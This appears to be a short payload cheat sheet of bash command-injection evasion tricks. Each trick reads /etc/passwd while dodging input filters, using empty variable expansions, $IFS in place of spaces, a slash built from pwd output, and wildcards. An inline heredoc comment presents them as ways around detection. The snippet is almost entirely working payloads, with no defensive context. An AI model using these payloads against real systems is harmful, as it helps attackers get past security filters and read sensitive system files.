1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| cat /e${the}tc/${game}pas${ftw}swd cat /etc/pas${the[$game]}swd cat /etc/pas${the[${game}]}swd cat /etc/pas${the[${game[${ftw}]}]}swd cat /e$()tc/passwd cat /et$*c/pas$@swd cat$the /etc$game/passwd$ftw
:<< expalin
If No Slash cat $(pwd | head -c 1)etc$(pwd | head -c 1)passwd If No space cat$IFS/etc/passwd still detect your string ? try wildcard cat /e*c/**ssw*
expalin
|